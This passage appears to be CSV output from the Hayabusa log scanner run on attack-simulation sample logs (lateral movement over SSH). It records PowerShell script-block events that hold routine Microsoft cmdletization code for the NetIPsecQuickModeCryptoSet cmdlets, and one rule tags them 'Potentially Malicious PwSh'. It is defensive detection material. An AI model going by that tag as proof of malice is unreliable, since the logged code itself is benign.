$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, 
[Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
